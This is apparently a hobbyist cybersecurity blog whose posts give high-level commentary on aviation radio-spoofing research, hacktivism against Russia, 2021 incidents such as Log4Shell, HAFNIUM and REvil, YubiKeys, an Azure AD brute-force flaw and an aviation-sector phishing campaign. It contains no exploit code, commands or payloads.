Planes are pretty cool! – Food for thought #3.

Just a little unstructured rambling today from me, I’m sure someone will enjoy the read…

I have begun reading through a 2016 thesis on Security in next-gen Air Traffic communication networks by Martin Strohmeier, it was brought to my attention regarding discussions about a possible use case for software defined radio. This isn’t anything new, the first proof of concept I saw of such methods was I believe from DEF CON 17 in 2009 but I can’t remember the date off the top of my head.

We can discuss some cool hacking stuff in a second, but first you need to understand how aircraft work. I’m going to briefly discuss this presentation from Usenix and their demonstrations of attacking an aircraft’s Instrument Landing System. Firstly, how this is supposed to work is done with multiple Tx (This means transmit, commonly receive and transmit are abbreviated to Rx and Tx respectively.) antennas. The localizer has the purpose of aligning the aircraft with the runway, the glideslope is responsible for controlling the rate of descent for the aircraft. The signals transmitted from these antennas are transmitted in a specific way that corresponds to the metrics the aircraft needs to measure. If you know enough about radio and security concepts then I highly recommend you read the presentation this is regarding, I’m not qualified to discuss it in too much detail but will be trying to learn more about this when I can.

So we discussed how the ILS systems are responsible for navigation during landing and very basically how they go about doing that, the presentation takes advantage of some of the behaviours of the aircraft ILS receivers. For example, they are designed to “lock on” to the strongest signal, which is brilliant when you think some airports have multiple runways and therefore multiple ILS systems so a way to figure out what one you need is required. But with what is called an “overshadow attack” an attacker can simply overpower the signals if they have enough information to carry out the attack, which is assumed due to things like FlightRadar24 allowing people to track flight paths and lots of information being already in the public domain regarding these systems. There is another called a “single-tone attack” but this is a little less straightforward than simply overpowering a signal, nevertheless I will touch on it at some point in the future after more reading.

Above, we went over a high-level explanation of one of these wireless attack types that could be orchestrated on an ILS system, just to add one of the biggest concerns I see mentioned is the relative affordability and availability of SDR modules. Now more people can carry out these attacks with less equipment than was required before, even carrying out an attack on board the aircraft… With demonstrated offsets of up to 50 metres and the added concealment an SDR may provide, this represents a serious attack vector that could be exploited to cause devastation and mass casualties.

Ok, so let’s get to some of the hacker stuff, what even brought this to my attention?

Ukrainian cyber forces have been hard at work, I was discussing this topic with some other hackers and a Ukrainian national given a “free pass” to hit Russia, whilst the topic at first was messing with these systems onboard the aircraft. Someone raised the idea of instead transmitting signals that would be expected to come from an aircraft, whilst this again isn’t a new idea… It’s been tested and even with notification and preparation caused an absolute nightmare for air traffic control. Furthermore, the opening for a denial-of-service attack is certainly worth highlighting. Nearly every system operated by a human is vulnerable to operator overload, that’s certainly not exclusive to human operators either. Just sending lots of signals could be all it takes to shut down a section of civilian airspace. It certainly would give Russian airspace controllers a hard time if it was done, however such an attack would be indiscriminate and by nature of naughty things… hard to control.

I will be looking into more of this topic in my spare time, also having just started getting competent with the cloud myself I will be looking to move this site onto an IaaS platform. However, there are many things to weigh up and I might not switch this site itself over but also need to explore the options available to me regarding things like subdomains. WordPress is fantastic and not something I want to leave for any reason, but as we move forward aacyber aspires to officially set up and be able to actively assist in keeping everyone in cyber space safe.

ALDIs DIY soldering iron is a decent buy for £9.99, even comes with 7 grams of solder. Sure, it’s not the best in the world but I’m not selling anything I make yet…

Here comes the “Cyber Army”.

Hello World…

So the Russian government finally pulled the trigger on their invasion into Ukraine, since then we have seen information warfare erupt as the Russian dictator tries to deny any wrongdoing. But I wanted to talk about the “Cyber Army” now threatening Russian government infrastructure, not the Ukrainians in particular but the world as whole.

Anonymous probably the most well known group that have been targeting Russia, dumping credentials and PGP keys from the mil.ru domain. This domain has since been geo-fenced to Russian territory. So what’s the issue… Hackers want to stand up for Ukraine and I have an issue with it?

Not just me, but many voices have spoke out about their concerns. Any party not affiliated with a government and/or its intelligence services should leave Russian systems the fuck alone. Firstly, no matter who your target is this kind of action is strictly prohibited and criminal, it will lead to consequences for anyone carrying out malicious activity… possibly prison time. Secondly, there is a significant risk to legitimate intelligence operations when a bunch of script kiddies start trampling around a system. Imagine hiding for years only to be undone because someone comes along with a drum set…

That is all, I am trying to push my skills more as of recently so the blog may slow down as I allow time for study. A little bit of a rant but it needs to be said, that’s my position on this.

Russian Threat Actors

Image Source: https://blog.malwarebytes.com/

Hello World!

Short and sweet here. With tensions between NATO and Russia rising, multiple agencies have put out advisories to keep your eyes peeled for cyber threats out of Russia. I would encourage anyone involved in security currently to view the tactics, techniques and procedures of these actors. Here’s a good report from CISA about the topic and a good read to help increase resilience to this current threat.

To keep yourself informed on the current cyberspace I recommend CyberWire Daily Podcast, the news is relevant and gives insight from experts in their fields.

Rather technical but it’s a topic that can no longer be avoided, hopefully our nations can work together to de-escalate this situation and work to improve security for citizens all around the world going forward.

2021 – A Year in review.

Hello World!

As the year of 2021 now comes to a complete closure, the effects of the new year festivities subside and teams, students and professionals sit back down in the office full time. Another year of what will surely be packed with many surprises awaits us…

2021 like 2020 was marred by the effects of the global coronavirus pandemic and a societal political divide like never before, pushing us further and further apart from each other at a time when cooperation and diversity is (as always) incredibly important within the IT industry.

That brings me onto the first topic of my review, as I will try to take a look at the situation of hybrid warfare that is happening every day. In my opinion, influence and information are the main goals of groups in the current landscape when it comes to this topic, it likely wont be in the future but we are still in very early stages. With the ability to spew misinformation & disinformation around a critical topic, such as the coronavirus or vaccines, this ability to control information and influence could be used to exacerbate another countries political unrest as well as overloading health systems worldwide. This topic isn’t specific to this year or the pandemic, as the information tactics are used worldwide almost every day… but we must ask ourselves: “Where did this information come from?”, “Is the source trustworthy?”, “Has this information been reviewed by independent experts?”.

As defenders were still feeling the effects the effects of the SolarWinds supply chain attack where more than 18,000 SolarWinds customers installed the malicious updates and were subsequently compromised last December, a new problem was found within Microsoft Exchange servers… well four of them to be precise.

A group that was given the name HAFNIUM was detected exploiting these 4 problems in the wild for information theft and espionage. HAFNIUM who Microsoft have said are “state-sponsored and operating out of China” are a sophisticated adversary that required haste from Microsoft to roll out updates. The attackers themselves would exploit the vulnerabilities in Microsoft exchange, the CVE’s associated with this attack are as follows: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. The adversary would then be looking to deploy a web shell on the server(s) they had compromised in order to further their position within the server and possibly exfiltrate information from the targets. However it wasn’t just HAFNIUM who were attempting to exploit these vulnerabilities, with mass scanning detected as taking place by threat intel teams after some time had elapsed.

Lets move to the month of May… probably the most significant month of 2021 in Cyber-Security: We saw five major attacks in these months, all of which had a significant effect on daily life for a large amount of people, they are as follows: The Colonial Pipeline ransomware attack, The Health Service Executive ransomware attack, The Waikato District Health Board ransomware attack, The JBS S.A. cyberattack and The Air India data breach.

So lets pick up on two factors here, ransomware and healthcare… Whilst I won’t elaborate too much on ransomware here as it’s nothing new and it’s not declining, nor is a prediction that “it’ll continue for 2022” worth spending oxygen on. As it’s become a constant pain in the backside over the last few years and will not be letting up soon. Instead let’s look at healthcare, other than critical infrastructure such as water, electric etc. healthcare is a key sector where an attack has the ability to not only cause damage, but also change lives and families. The problem of why healthcare find themselves susceptible to attacks lies in the critical role their staff and systems play on a daily basis, with some of these computers being relied on to save lives or computers that operate complex machinery. It increases the difficultly of upgrading these systems, not to mention the factor of cost of product AND the cost to upskill employees with the new equipment/systems… sometimes pushing the task of upgrading or patching systems down the list.

Well I’m struggling to keep it short and sweet here, but let’s move onto the month of July where we saw the Kaseya Ransomware attack which saw ransomware group REvil claim to infect more than 1 million devices, according to security firm Sophos. This was another supply chain attack as Kaseya said that less than 60 customers were affected, however the impact was felt by under 1500 downstream businesses. The crooks attempted to extort $70m in cryptocurrency from the compromised businesses, however REvil would be soon to lose their control…

In one of the first public cases of “hacking back” by the FBI that I have seen myself (I wrote a post about it that can be seen here.) There was a lot of activity by law enforcement, that sparked weeks of speculation before the FBI confirmed they had indeed compromised the group behind the attack on Kaseya and withheld the decryption key for some time. This was done in order to not tip-off the cyber gang to their activity, as a decryption key suddenly appearing would surely set alarm bells off in the criminals heads. The story had a mostly happy ending with a small number of criminals being jailed, money that was paid being recovered by law enforcement and the distribution of the universal decryptor to affected parties.

While there’s tons to potentially discuss on the topic, I’d like this to be a comfortable read… Briefly ill close by mentioning the log4j vulnerabilities, which since my last blog post have slightly escalated with more vulnerabilities being discovered in log4j on an almost weekly basis. No doubt due to hackers of all kinds swarming over log4j, as it marks one of the most significant vulnerabilities in history as noted by the initial CVSS score of 10.0, however more recent vulnerabilities are less severe. Advice as of this post is that safe versions currently are Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).

Well that’s all in my mini-review. As we look towards another year with newfound hope and motivation, I hope this year is better for all of us and to see more smiles on the faces of people as we all play our role in protecting others.

Sources: https://whatis.techtarget.com/feature/SolarWinds-hack-explained-Everything-you-need-to-know
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/
https://www.techrepublic.com/article/kaseya-supply-chain-attack-impacts-more-than-1000-companies/

Remote Code Execution in Java Apache Log4j 2 (CVE-2021-44228)

Hello World!

The Internet was rattled the last couple of days over a new critical bug found within a very ubiquitous library, current known vulnerable versions include but may not be limited to Apache Log4j versions 2.10 to 2.14.1. Patches are now mostly available and should be installed as soon as possible, 44228 is currently being exploited in the wild and there’s even been a case of log4j payloads being used with crypto miner.

Edit 4th January 2022: Updated mitigation information, current secure versions are are follows: Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6)

JNDI – Java Naming and Directory Interface.

LDAP – Lightweight Directory Access Protocol.

A basic flow chart to illustrate the attack methods. Credit: Fastly

Here’s a brief explanation of the exploit from an attackers perspective… An attacker controlled value is parsed to the logging library, the attacker then exploits the string interpolation feature inside log4j to trigger object deserialization which results in the conditions for remote code execution on the server. To put this simply for others, this allows the attacker to execute their own code on the server, essentially letting them do anything… (But this will depend on the attackers skill level.)

Since the 9th December the Cyber Security world has been scrambling to mitigate this vulnerability, there are configuration options that will allow you to disable functionalities that result in this vulnerability but that’s likely a temporary fix. Updating the vulnerable library if you have the ability to, but many people will have to wait for individual patches from the vendors of their products.

On November 24, 2021, Apache was notified about the Log4j remote code execution vulnerability by the Alibaba Cloud Security team. The exploit proof of concept was then posted to Github at 15:32 GMT on December 9, 2021, and we saw the first attempts to trigger callbacks 82 minutes later.

I also received my YubiKeys around the same time, which I haven’t completed setting up yet but plan to have a post about them up soon, it won’t be highly technical as I more want to sell the technology and get the point across why you should be using MFA and/or security keys.

Sources: https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j & Bishop Fox/YouTube

YubiKeys!

Hello World!

I finally bit the bullet and bought myself two YubiKeys and a cover for each. One for my person and one for a safe place configured as a backup.

What’s a YubiKey?

Wikipedia states: “The YubiKey is a hardware authentication device manufactured by Yubico to protect access to computers, networks, and online services that supports one-time passwords, public-key cryptography, and authentication, and the Universal 2nd Factor and FIDO2 protocols developed by the FIDO Alliance.”

Only a short post today but expect to see a post about my initial thoughts and experiences using the YubiKey. There’s currently some cool Black Friday deals going on and I would advise you take a look if you want to step up your account security with YubiKeys!

Combined with a password manager and multi-factor authentication (where the YubiKey comes in.) This will stop nearly all attempts against your accounts… I have heard of a 99% figure for just 2FA being enabled but don’t have a source at this moment for that figure.

REvil on the run!

Hello World!

Ransomware hackers and affiliates of the REvil (Ransomware Evil), also known as Sodinokibi are on the run from the feds this week, one can suspect that the US authorities have it out for them as this is not the first occasion of direct engagement against this threat actor (TA).

If you follow the story closely like I do, then you might already be aware about the kerfuffle with the decryption keys a few months ago now, but the official story about it only dropped a couple weeks ago. Basically, one of Kaseya’s IT management platforms was compromised in what we call a supply chain attack, the method being to hold the companies that use this platform and their data to ransom.

This is achieved through the used of a piece of malware known as Ransomware, which falls under the category of Crypto-malware, see the image below for a look at what a user infected with the WannaCry ransomware would see after being infected.

So, what did I mean when I said this isn’t the first engagement… and the recent news of the official story?

Well the gang took themselves “offline” after attracting too much attention after their attack on Kaseya… Then re-emerged from the shadows a few months later. What the gang and their affiliates were unaware of is that a campaign by international law enforcement had; compromised their systems; exfiltrated information and most importantly here… Had already compromised the backups that REvil has used to restore their infrastructure. So you can see who has the upper hand in this situation.

To step away from the story of REvil and their fight with government hackers. (Which isn’t going so well for the criminals, who have seen multiple arrests across countries.) It would be good to have a brief talk about what we do to defend against ransomware and just how much the battlefield is evolving. Firstly let’s go all the way back to 1989 when the AIDS Trojan first made it’s way onto computers via the medium of floppy disk, this was the first documented case of a ransomware attack. Victims were requested to mail cash to a PO address in Panama, however security researchers were able to quickly develop tools that would decrypt the data relatively easily.

Now, you don’t need to know too much about how it’s changed over the years to the technical details about how it encrypts, installs and so on. But let’s step back into 2021 and nearly 2022 as I write this… Ransomware is no longer just about a “denial of service” to the data, but we have seen the rise of double-extortion where they not only encrypt your data but also exfiltrate, and threaten to make it public too!

Our security methods change all the time, but active defence could play an important role in the defence against these double extortion attacks. If a network defender can keep creating file shares padded with random but legitimate looking information, use telemetry simulators to confuse the attackers and many other techniques that can give the defender an upper hand.

I look forward to hopefully taking a look at some methods that would be used to stall an attack as it happens, but will recommend a book to any security professional interested in the idea of a cyber-battlefield as it’s a brilliant read… Adversarial Tradecraft in Cybersecurity by Dan Borges.

Undetected Brute force attacks in Microsoft Azure AD.

Hello World!

Recently Security Researchers have released a PoC (proof-of-concept) exploit that allows for username enumeration and password brute-forcing on vulnerable Microsoft Azure servers, more specifically Azure active directory. Is is able to do this by taking advantage of weaknesses that lie within the Autologon mechanism.

Let’s do a quick breakdown on some of these words here, for those who are unsure –

Exploit – An exploit is something that is designed to take advantage of a single or sometimes multiple weaknesses within another person or device, however it is a universal term and not limited to only people or computer systems.

Enumeration – Enumeration is the process of identification, categorization and documentation. Here we are using it to refer to username enumeration, this in simple terms means “gathering a list of usernames.” This can be achieved with various methods and again isn’t necessarily technical.

Brute-forcing – Let’s take a PIN number on a phone for example, if you have no idea what it might be, but you continue to guess every combination possible until you get it right, you’ve brute-forced it.

Lockout – Not mentioned in the first paragraph but is essential to understanding brute-force attacks and the most simple mechanism to stop them… Lockouts, so the phone we brute-forced was an example. In case you’ve never seen what a lockout looks like, try inputting the wrong password/pin into your phone a few times (Not too much because the lockout will increment up to around 24 hours.) This mechanism detects incorrect input and assumes you are not authorized, should you incorrectly input your username/password multiple times, then you will be blocked from further attempts for X amount of time. (And there should be a log the administrators can see that will show ALL successful/unsuccessful attempts and provide further info.)

Active Directory – I took this one from techterms.com as Active Directory and Azure Active directory are a lot to take in and I really don’t want to scare non-technical users with lots of different names to remember, click the link and it’ll show more information, but still only scratches the surface.

“Active Directory (AD) is a Microsoft technology used to manage computers and other devices on a network. It is a primary feature of Windows Server, an operating system that runs both local and Internet-based servers. Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.”

Azure – Azure is Microsoft’s Cloud Platform, its what AWS is to Amazon. Essentially cloud means off-site, however there are many different models that are used such as SaaS and PaaS. Additionally attackers use the cloud and have been seen operating RaaS (Ransomware as a service).

“This flaw allows threat actors to perform single-factor brute-force attacks against Azure Active Directory (Azure AD) without generating sign-in events in the targeted organization’s tenant,” researchers from Secureworks Counter Threat Unit (CTU) said in a report published on Wednesday.

It would appear that this vulnerability affects Office clients older than the Office 2013 May 2015 update, it also seems that these older versions do not use Kerberos. Instead in order to carry out authentication a password-based endpoint called “UserNameMixed” is used instead, either generating an access token or an error code based on the input from the user.

So here’s the problem and we will come back to where Autologon plays a role in this… Whilst successful sign-ins generate logs when they send the access tokens, authentication from Autologon to Azure AD is not logged, this allows attackers to leverage this fact around the logging in order to carry out password spraying/brute force attacks without generating logs. (Password spraying is a type of brute-forcing but involves more guessing, for example trying the known default credentials for admin accounts, or using usernames found elsewhere in an attack to really cut down the amount of attempts needed, sometimes this can be used to just brute force one field, where the other is known as a constant.)

Finally let’s see how the vendor responded… “Secureworks said it notified Microsoft of the issue on June 29, only for Microsoft to acknowledge the behaviour on July 21 as “by design.” ” Oh okay! Ambiguous and puzzling… nothing new here.

Sources: https://arstechnica.com/information-technology/2021/09/poc-exploit-released-for-azure-ad-brute-force-bug-heres-what-to-do/ https://thehackernews.com/2021/09/new-azure-ad-bug-lets-hackers-brute.html

Operation Layover – Attack campaign against Aviation sector uncovered.

Hello World!

I wanted to take a look at a recent phishing campaign that was uncovered after being active for roughly two years, interesting for me as I have studied Aviation operations in the past and have good knowledge of their procedures and practices.

So let’s see what we know about this threat actor… They are suspected to be operating out of Nigeria, and from what we can gather aren’t very technically skilled. A quote from the Microsoft Security Intelligence team who first released research of these attacks in May 2021 and talks of a “dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT.”

Okay! So what’s a RAT? A RAT or Remote Access Trojan is another form of computer malware, a cousin of the computer virus and brother of the rootkit. This program acts as a backdoor to the victims device, it will then establish communications with a command-and-control server, where it will receive further instructions from the attackers. This communication could be to upload further malware such as a rootkit or crypto locker and/or exfiltrate data and information from the victim and hold it for ransom (However a sophisticated attacker might first look for privilege escalation and then pivot to a machine that hosts something like… Hmm anything really, a database for example. Or if your team is having a really bad day, they might even get into your backups if you haven’t taken the necessary steps to store these backups off-site and on tape, as well as following your organisations guidelines… and put simply, you cant restore if the backups f****ed)

To read from the Cisco TALOS post here: researchers Tiago Pereira and Vitor Ventura said. “The actor also buys the crypters that allow the usage of such malware without being detected, throughout the years it has used several different cryptors, mostly bought on online forums.” Now this is a tactic that’s become more prevalent the last few years with less skilled threat actors, who often lack the programming knowledge to create malware or even edit malware in some cases. This use of a different crypter, format or language will change the outcome of the file (In some cases actors have just taken malware and switched it to another language, compiled it and boom). This isn’t a magical bypass by any means, but our signature-based security devices will fail to recognize this threat and take action, for this we need a solution for the canonicalization of this data; but, ultimately lack this ability.

Our Signature based security devices will look for known signatures given off by documented malware, this could be anything from know IP addresses of command-and-control servers, known malicious domain names to a SHA256 hash of a known malicious file. It’s in the latter where one single character will change the hash completely and render this form of security ineffective until it is given the new intelligence. However this is where other forms of security device would pick up and identify the threat, a reminder to layer your security… but not to over-complicate things.

So, we’ve covered the geeky stuff about what’s going on here. Now for the heart of this campaign which is less geeky and probably a familiar sight to any security staff… The vector of attack? Social Engineering.

In this case it was a spear-phishing campaign, the emails aren’t anything fancy just very legitimate looking as you would expect from pretty much any spear-phishing campaign as they tend to be the hardest to spot, it was through these phishing emails that the victim would be prompted to install (a disguised version) of the remote access trojan as shown by the email at the beginning of my post.

Source: https://thehackernews.com/2021/09/malware-attack-on-aviation-sector.html